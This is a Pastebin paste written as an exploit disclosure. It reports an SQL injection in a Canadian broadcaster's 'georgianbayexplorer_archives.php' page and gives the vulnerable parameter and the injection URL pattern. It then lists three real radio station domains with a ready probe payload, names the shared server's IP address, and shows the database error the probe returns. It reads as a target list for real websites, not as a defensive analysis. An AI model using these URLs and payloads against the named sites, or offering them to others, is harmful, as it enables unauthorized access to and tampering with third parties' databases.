Advertisement
KingSkrupellos

BayShoreBroadCasting SQL Injection

Apr 12th, 2020
120
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.91 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : BayShoreBroadCasting SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 13/04/2020
  7. # Vendor Homepage : bayshorebroadcasting.ca
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  12. Special Elements used in an SQL Command ('SQL Injection') ]
  13. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  14. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  15. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  16. # Pastebin : pastebin.com/u/KingSkrupellos
  17.  
  18. ###################################################################
  19.  
  20. # Impact :
  21. ***********
  22. BayShoreBroadCasting is prone to an SQL-injection vulnerability because
  23. it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  24. Exploiting this issue could allow an attacker to compromise the application, access or
  25. modify data, or exploit latent vulnerabilities in the underlying database.
  26. A remote attacker can send a specially crafted request to the vulnerable application and
  27. execute arbitrary SQL commands in application`s database. Further exploitation of this
  28. vulnerability may result in unauthorized data manipulation.
  29. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  30.  
  31. ###################################################################
  32.  
  33. # SQL Vulnerable File :
  34. **********************
  35. /georgianbayexplorer_archives.php
  36.  
  37. # SQL Vulnerable Parameter :
  38. ***************************
  39. ?pageNum_rsexplorer=[ID-NUMBER]&totalRows_rsexplorer=[SQL Injection]
  40.  
  41. # SQL Injection Exploit :
  42. **********************
  43. /georgianbayexplorer_archives.php?pageNum_rsexplorer=[ID-NUMBER]&totalRows_rsexplorer=[SQL Injection]
  44.  
  45. ###################################################################
  46.  
  47. # Example Vulnerable Sites :
  48. *************************
  49. Reverse IP results (209.200.231.176)
  50. There are 11 domains hosted on this server.
  51.  
  52. [+] mix106.ca/georgianbayexplorer_archives.php?pageNum_rsexplorer=6&totalRows_rsexplorer=1%27
  53.  
  54. [+] mix1065.ca/georgianbayexplorer_archives.php?pageNum_rsexplorer=6&totalRows_rsexplorer=1%27
  55.  
  56. [+] 560cfos.ca/georgianbayexplorer_archives.php?pageNum_rsexplorer=6&totalRows_rsexplorer=1%27
  57.  
  58. ###################################################################
  59.  
  60. # Example SQL Database Error :
  61. ****************************
  62. You have an error in your SQL syntax; check the manual that corresponds to your
  63. MariaDB server version for the right syntax to use near '= 1 AND Programming.Saturday = 1
  64. ORDER BY StartTime ASC LIMIT 0, 100' at line 1
  65.  
  66. ###################################################################
  67.  
  68. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  69.  
  70. ###################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement